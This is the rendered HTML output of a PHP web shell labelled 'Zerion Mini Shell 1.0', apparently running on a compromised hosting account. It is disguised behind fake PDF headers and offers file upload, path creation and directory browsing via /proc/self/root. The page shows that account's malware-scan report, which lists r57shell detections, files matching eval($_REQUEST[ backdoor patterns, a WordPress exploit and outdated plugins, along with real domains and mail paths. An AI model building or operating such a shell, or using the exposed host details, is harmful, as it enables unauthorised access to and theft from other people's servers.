%PDF-
%PDF-
<form action="#" method="post"><input type="hidden" name="logout" value="1"> <input type="submit" value="logout"></form><!DOCTYPE HTML>
<HTML>
<HEAD>
<link href="" rel="stylesheet" type="text/css">
<title>Mini Shell</title>
<style>
body{
font-family: "Racing Sans One", cursive;
background-color: #e6e6e6;
text-shadow:0px 0px 1px #757575;
}
#content tr:hover{
background-color: #636263;
text-shadow:0px 0px 10px #fff;
}
#content .first{
background-color: silver;
}
#content .first:hover{
background-color: silver;
text-shadow:0px 0px 1px #757575;
}
table{
border: 1px #000000 dotted;
}
H1{
font-family: "Rye", cursive;
}
a{
color: #000;
text-decoration: none;
}
a:hover{
color: #fff;
text-shadow:0px 0px 10px #ffffff;
}
input,select,textarea{
border: 1px #000000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
</style>
</HEAD>
<BODY>
<H1><center><img src="https://s.yimg.com/lq/i/mesg/emoticons7/19.gif"/>
 Mini Shell <img src="https://s.yimg.com/lq/i/mesg/emoticons7/19.gif"/>
 </center></H1>
<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tr><td>Direktori : <a href="?path=/">/</a><a href="?path=//proc">proc</a>/<a href="?path=//proc/self">self</a>/<a href="?path=//proc/self/root">root</a>/<a href="?path=//proc/self/root/home">home</a>/<a href="?path=//proc/self/root/home/eirtvhdf">eirtvhdf</a>/</td></tr><tr><td><form enctype="multipart/form-data" method="POST">
Upload File : <input type="file" name="file" />
<input type="submit" value="upload" />
</form>
</td></tr>
<tr><td><form enctype="multipart/form-data" method="POST">
Create Path : <input type="text" name="path_create" />
<input type="submit" value="create" />
</form></td></td><tr><td>Current File : //proc/self/root/home/eirtvhdf/scanreport-eirtvhdf-Aug_25_2023_03h29m.txt</tr></td></table><br /><pre>
'/home/eirtvhdf/scanreport-eirtvhdf-Aug_25_2023_03h29m.txt'
# (quarantined to /opt/cxs/quarantine/cxsuser/root/scanreport-eirtvhdf-Aug_25_2023_03h29m.txt.1692948617_1) ClamAV detected virus = [YARA.r57shell_php_php.UNOFFICIAL]

'/home/eirtvhdf/.cpanel/live-engine-connector-JP6DjtEysF.sock'
# Socket

'/home/eirtvhdf/.nc_plugin/hidden'
# World writeable directory

'/home/eirtvhdf/.trash/Wiz8.php'
# Regular expression match = [eval\(\$_REQUEST\[]

'/home/eirtvhdf/.trash/blog.php'
# Regular expression match = [eval\(\$_REQUEST\[]

'/home/eirtvhdf/.trash/index.php.1'
# Regular expression match = [eval\(\$_REQUEST\[]

'/home/eirtvhdf/.trash/maxminddb.c'
# Suspicious file type [application/x-c]

'/home/eirtvhdf/.trash/legal/client/.1688803601'
# Regular expression match = [eval\(\$_REQUEST\[]

'/home/eirtvhdf/.trash/legal/client/.1688920766'
# Regular expression match = [eval\(\$_REQUEST\[]

'/home/eirtvhdf/.trash/legal/client/commenters.php'
# Regular expression match = [eval\(\$_REQUEST\[]

'/home/eirtvhdf/.trash/legal/client/renderinfo.php'
# Regular expression match = [eval\(\$_REQUEST\[]

'/home/eirtvhdf/cloudsslamllc.com/wp-content/plugins/mplugin.php'
# (quarantined to /opt/cxs/quarantine/cxsuser/eirtvhdf/mplugin.php.1692948762_1) Known exploit = [Fingerprint Match] [PHP WP Exploit [P1968]]

'/home/eirtvhdf/cloudsslamllc.com/wp-content/plugins/akismet/akismet.php'
# Script version check [OLD] [Akismet Anti-Spam v4.1.9 &lt; v4.2.2]

'/home/eirtvhdf/cloudsslamllc.com/wp-content/plugins/bdthemes-element-pack/includes/admin-settings.php'
# Universal decode regex match = [universal decoder]

'/home/eirtvhdf/cloudsslamllc.com/wp-content/plugins/contact-form-7/wp-contact-form-7.php'
# Script version check [OLD] [Contact Form 7 v5.4.2 &lt; v5.5.6]

'/home/eirtvhdf/cloudsslamllc.com/wp-content/plugins/duplicate-page/duplicatepage.php'
# Script version check [OLD] [Duplicate Page v4.4.1 &lt; v4.4.8]

'/home/eirtvhdf/cloudsslamllc.com/wp-content/plugins/elementor/elementor.php'
# Script version check [OLD] [Elementor v3.3.1 &lt; v3.5.6]

'/home/eirtvhdf/cloudsslamllc.com/wp-content/plugins/jetpack/jetpack.php'
# Script version check [OLD] [Jetpack v10.0 &lt; v10.7]

'/home/eirtvhdf/cloudsslamllc.com/wp-content/plugins/mailchimp-for-woocommerce/mailchimp-woocommerce.php'
# Script version check [OLD] [Mailchimp for WooCommerce v2.5.2 &lt; v2.6.1]

'/home/eirtvhdf/cloudsslamllc.com/wp-content/plugins/mailchimp-for-wp/mailchimp-for-wp.php'
# Script version check [OLD] [MC4WP: Mailchimp for WordPress v4.8.6 &lt; v4.8.7]

'/home/eirtvhdf/cloudsslamllc.com/wp-content/plugins/woocommerce/woocommerce.php'
# Script version check [OLD] [WooCommerce v5.5.4 &lt; v6.3.1]

'/home/eirtvhdf/cloudsslamllc.com/wp-content/plugins/woocommerce/vendor/maxmind-db/reader/ext/maxminddb.c'
# Suspicious file type [application/x-c]

'/home/eirtvhdf/cloudsslamllc.com/wp-content/plugins/woocommerce-services/woocommerce-services.php'
# Script version check [OLD] [WooCommerce Shipping &amp; Tax v1.25.17 &lt; v1.25.23]

'/home/eirtvhdf/logs/cloudslam.eirtechs.com-Aug-2023.gz'
# (quarantined to /opt/cxs/quarantine/cxsuser/eirtvhdf/cloudslam.eirtechs.com-Aug-2023.gz.1692949712_1) ClamAV detected virus = [{HEX}php.malware.magento.585.UNOFFICIAL]

'/home/eirtvhdf/logs/cloudsslamllc.eirtechs.com-Aug-2023.gz'
# (quarantined to /opt/cxs/quarantine/cxsuser/eirtvhdf/cloudsslamllc.eirtechs.com-Aug-2023.gz.1692949713_1) ClamAV detected virus = [{HEX}php.malware.magento.585.UNOFFICIAL]

'/home/eirtvhdf/logs/cloudsslamllc.eirtechs.com-Jul-2023.gz'
# (quarantined to /opt/cxs/quarantine/cxsuser/eirtvhdf/cloudsslamllc.eirtechs.com-Jul-2023.gz.1692949713_1) ClamAV detected virus = [{HEX}php.malware.magento.585.UNOFFICIAL]

'/home/eirtvhdf/logs/crm.eirtechs.com-Aug-2023.gz'
# (quarantined to /opt/cxs/quarantine/cxsuser/eirtvhdf/crm.eirtechs.com-Aug-2023.gz.1692949722_1) ClamAV detected virus = [{HEX}php.malware.magento.585.UNOFFICIAL]

'/home/eirtvhdf/logs/crm.eirtechs.com-ssl_log-Aug-2023.gz'
# (quarantined to /opt/cxs/quarantine/cxsuser/eirtvhdf/crm.eirtechs.com-ssl_log-Aug-2023.gz.1692949722_1) ClamAV detected virus = [{HEX}php.malware.magento.585.UNOFFICIAL]

'/home/eirtvhdf/logs/crystal.eirtechs.com-Aug-2023.gz'
# (quarantined to /opt/cxs/quarantine/cxsuser/eirtvhdf/crystal.eirtechs.com-Aug-2023.gz.1692949725_1) ClamAV detected virus = [{HEX}php.malware.magento.585.UNOFFICIAL]

'/home/eirtvhdf/logs/designbeasts.eirtechs.com-Aug-2023.gz'
# (quarantined to /opt/cxs/quarantine/cxsuser/eirtvhdf/designbeasts.eirtechs.com-Aug-2023.gz.1692949727_1) ClamAV detected virus = [{HEX}php.malware.magento.585.UNOFFICIAL]

'/home/eirtvhdf/logs/designbeasts.eirtechs.com-ssl_log-Aug-2023.gz'
# (quarantined to /opt/cxs/quarantine/cxsuser/eirtvhdf/designbeasts.eirtechs.com-ssl_log-Aug-2023.gz.1692949727_1) ClamAV detected virus = [{HEX}php.malware.magento.585.UNOFFICIAL]

'/home/eirtvhdf/logs/eirtechs.com-Aug-2023.gz'
# (quarantined to /opt/cxs/quarantine/cxsuser/eirtvhdf/eirtechs.com-Aug-2023.gz.1692949733_1) ClamAV detected virus = [{HEX}php.malware.magento.585.UNOFFICIAL]

'/home/eirtvhdf/logs/haleh.eirtechs.com-Aug-2023.gz'
# (quarantined to /opt/cxs/quarantine/cxsuser/eirtvhdf/haleh.eirtechs.com-Aug-2023.gz.1692949738_1) ClamAV detected virus = [{HEX}php.malware.magento.585.UNOFFICIAL]

'/home/eirtvhdf/logs/hire-va.eirtechs.com-Aug-2023.gz'
# (quarantined to /opt/cxs/quarantine/cxsuser/eirtvhdf/hire-va.eirtechs.com-Aug-2023.gz.1692949738_1) ClamAV detected virus = [{HEX}php.malware.magento.585.UNOFFICIAL]

'/home/eirtvhdf/logs/hire-va.eirtechs.com-ssl_log-Aug-2023.gz'
# (quarantined to /opt/cxs/quarantine/cxsuser/eirtvhdf/hire-va.eirtechs.com-ssl_log-Aug-2023.gz.1692949739_1) ClamAV detected virus = [{HEX}php.malware.magento.585.UNOFFICIAL]

'/home/eirtvhdf/logs/law.eirtechs.com-Aug-2023.gz'
# (quarantined to /opt/cxs/quarantine/cxsuser/eirtvhdf/law.eirtechs.com-Aug-2023.gz.1692949745_1) ClamAV detected virus = [{HEX}php.malware.magento.585.UNOFFICIAL]

'/home/eirtvhdf/logs/leecooper.eirtechs.com-Aug-2023.gz'
# (quarantined to /opt/cxs/quarantine/cxsuser/eirtvhdf/leecooper.eirtechs.com-Aug-2023.gz.1692949746_1) ClamAV detected virus = [{HEX}php.malware.magento.585.UNOFFICIAL]

'/home/eirtvhdf/logs/logobrainiac.eirtechs.com-Aug-2023.gz'
# (quarantined to /opt/cxs/quarantine/cxsuser/eirtvhdf/logobrainiac.eirtechs.com-Aug-2023.gz.1692949748_1) ClamAV detected virus = [{HEX}php.malware.magento.585.UNOFFICIAL]

'/home/eirtvhdf/logs/logobrainiac.eirtechs.com-ssl_log-Aug-2023.gz'
# (quarantined to /opt/cxs/quarantine/cxsuser/eirtvhdf/logobrainiac.eirtechs.com-ssl_log-Aug-2023.gz.1692949748_1) ClamAV detected virus = [{HEX}php.malware.magento.585.UNOFFICIAL]

'/home/eirtvhdf/logs/makkitrust.org.eirtechs.com-Aug-2023.gz'
# (quarantined to /opt/cxs/quarantine/cxsuser/eirtvhdf/makkitrust.org.eirtechs.com-Aug-2023.gz.1692949750_1) ClamAV detected virus = [{HEX}php.malware.magento.585.UNOFFICIAL]

'/home/eirtvhdf/logs/marketing.eirtechs.com-Aug-2023.gz'
# (quarantined to /opt/cxs/quarantine/cxsuser/eirtvhdf/marketing.eirtechs.com-Aug-2023.gz.1692949751_1) ClamAV detected virus = [{HEX}php.malware.magento.585.UNOFFICIAL]

'/home/eirtvhdf/logs/tct.eirtechs.com-Aug-2023.gz'
# (quarantined to /opt/cxs/quarantine/cxsuser/eirtvhdf/tct.eirtechs.com-Aug-2023.gz.1692949756_1) ClamAV detected virus = [{HEX}php.malware.magento.585.UNOFFICIAL]

'/home/eirtvhdf/logs/va.eirtechs.com-Aug-2023.gz'
# (quarantined to /opt/cxs/quarantine/cxsuser/eirtvhdf/va.eirtechs.com-Aug-2023.gz.1692949757_1) ClamAV detected virus = [{HEX}php.malware.magento.585.UNOFFICIAL]

'/home/eirtvhdf/logs/va.eirtechs.com-ssl_log-Aug-2023.gz'
# (quarantined to /opt/cxs/quarantine/cxsuser/eirtvhdf/va.eirtechs.com-ssl_log-Aug-2023.gz.1692949757_1) ClamAV detected virus = [{HEX}php.malware.magento.585.UNOFFICIAL]
# Scan Timeout (30 secs) while processing:
'/home/eirtvhdf/mail/eirtechs.com/hr/cur/1612823204.M712876P592946.business91.web-hosting.com,S=15861816,W=16067853:2,S'
# Scan Timeout (30 secs) while processing:
'/home/eirtvhdf/mail/eirtechs.com/info/cur/1617398313.M785045P2076132.business91.web-hosting.com,S=19046634,W=19307676:2,S'
# Scan Timeout (30 secs) while processing:
'/home/eirtvhdf/mail/eirtechs.com/shabbir/.Sent/cur/1663689800.M867814P1304872.business91.web-hosting.com,S=21488283,W=21782656:2,S'
# Scan Timeout (30 secs) while processing:
'/home/eirtvhdf/mail/eirtechs.com/shabbir/.Sent/cur/1664383596.M699777P3997701.business91.web-hosting.com,S=24561963,W=24898445:2,S'
# Scan Timeout (30 secs) while processing:
'/home/eirtvhdf/mail/eirtechs.com/shabbir/.Sent/cur/1667856660.M579334P1336335.business91.web-hosting.com,S=14894136,W=15098178:2,S'
# Scan Timeout (30 secs) while processing:
'/home/eirtvhdf/mail/eirtechs.com/shabbir/.Sent/cur/1668084001.M66069P771307.business91.web-hosting.com,S=20227993,W=20505106:2,S'
# Scan Timeout (30 secs) while processing:
'/home/eirtvhdf/mail/eirtechs.com/shabbir/.Sent/cur/1670592070.M997558P2960017.business91.web-hosting.com,S=16853745,W=17084632:2,S'
# Scan Timeout (30 secs) while processing:
'/home/eirtvhdf/mail/logobrainiacs.com/info/cur/1622058820.M399230P321540.business91.web-hosting.com,S=21329626,W=21606665:2,S'

'/home/eirtvhdf/makkitrust.org/index.php'
# Decode regex match = [decode regex: 1]

'/home/eirtvhdf/tmp/awstats/awstats072023.makkitrust.org.eirtechs.com.txt'
# (quarantined to /opt/cxs/quarantine/cxsuser/eirtvhdf/awstats072023.makkitrust.org.eirtechs.com.txt.1692953895_1) ClamAV detected virus = [{HEX}php.malware.magento.585.UNOFFICIAL]

'/home/eirtvhdf/tmp/awstats/awstats082023.makkitrust.org.eirtechs.com.txt'
# (quarantined to /opt/cxs/quarantine/cxsuser/eirtvhdf/awstats082023.makkitrust.org.eirtechs.com.txt.1692953897_1) ClamAV detected virus = [{HEX}php.malware.magento.585.UNOFFICIAL]

'/home/eirtvhdf/tmp/awstats/ssl/awstats032022.cloudslam.eirtechs.com.txt'
# (quarantined to /opt/cxs/quarantine/cxsuser/eirtvhdf/awstats032022.cloudslam.eirtechs.com.txt.1692953913_1) ClamAV detected virus = [YARA.r57shell_php_php.UNOFFICIAL]

'/home/eirtvhdf/tmp/awstats/ssl/awstats032022.comic.eirtechs.com.txt'
# (quarantined to /opt/cxs/quarantine/cxsuser/eirtvhdf/awstats032022.comic.eirtechs.com.txt.1692953913_1) ClamAV detected virus = [YARA.r57shell_php_php.UNOFFICIAL]

'/home/eirtvhdf/tmp/awstats/ssl/awstats032022.crystal.eirtechs.com.txt'
# (quarantined to /opt/cxs/quarantine/cxsuser/eirtvhdf/awstats032022.crystal.eirtechs.com.txt.1692953913_1) ClamAV detected virus = [YARA.r57shell_php_php.UNOFFICIAL]

'/home/eirtvhdf/tmp/awstats/ssl/awstats052023.hire-va.eirtechs.com.txt'
# (quarantined to /opt/cxs/quarantine/cxsuser/eirtvhdf/awstats052023.hire-va.eirtechs.com.txt.1692953922_1) ClamAV detected virus = [YARA.r57shell_php_php.UNOFFICIAL]

'/home/eirtvhdf/tmp/awstats/ssl/awstats072023.crm.eirtechs.com.txt'
# (quarantined to /opt/cxs/quarantine/cxsuser/eirtvhdf/awstats072023.crm.eirtechs.com.txt.1692953929_1) ClamAV detected virus = [{HEX}php.malware.magento.585.UNOFFICIAL]

'/home/eirtvhdf/tmp/awstats/ssl/awstats082023.crm.eirtechs.com.txt'
# (quarantined to /opt/cxs/quarantine/cxsuser/eirtvhdf/awstats082023.crm.eirtechs.com.txt.1692953933_1) ClamAV detected virus = [{HEX}php.malware.magento.585.UNOFFICIAL]

'/home/eirtvhdf/tmp/awstats/ssl/awstats082023.designbeasts.eirtechs.com.txt'
# (quarantined to /opt/cxs/quarantine/cxsuser/eirtvhdf/awstats082023.designbeasts.eirtechs.com.txt.1692953933_1) ClamAV detected virus = [{HEX}php.malware.magento.585.UNOFFICIAL]

'/home/eirtvhdf/tmp/awstats/ssl/awstats082023.logobrainiac.eirtechs.com.txt'
# (quarantined to /opt/cxs/quarantine/cxsuser/eirtvhdf/awstats082023.logobrainiac.eirtechs.com.txt.1692953934_1) ClamAV detected virus = [{HEX}php.malware.magento.585.UNOFFICIAL]

'/home/eirtvhdf/tmp/awstats/ssl/awstats082023.va.eirtechs.com.txt'
# (quarantined to /opt/cxs/quarantine/cxsuser/eirtvhdf/awstats082023.va.eirtechs.com.txt.1692953934_1) ClamAV detected virus = [{HEX}php.malware.magento.585.UNOFFICIAL]

'/home/eirtvhdf/tmp/awstats/ssl/awstats112021.eirtechs.com.txt'
# (quarantined to /opt/cxs/quarantine/cxsuser/eirtvhdf/awstats112021.eirtechs.com.txt.1692953940_1) ClamAV detected virus = [YARA.eval_post.UNOFFICIAL]

'/home/eirtvhdf/var/cpanel/styled/current_style'
# Symlink to [/usr/local/cpanel/base/frontend/paper_lantern/styled/dark]

'/home/eirtvhdf/wixted.eirtechs.com/index.php'
# Decode regex match = [decode regex: 1]

----------- SCAN SUMMARY -----------
Scanned directories: 10669
Scanned files: 58356
Ignored items: 417
Suspicious matches: 61
Viruses found: 35
Fingerprint matches: 1
Data scanned: 6177.09 MB
Scan peak memory: 272864 kB
Scan time/item: 0.078 sec
Scan time: 5387.750 sec

</pre><center><br />Zerion Mini Shell <font color="green">1.0</font></center>
</BODY>
</HTML>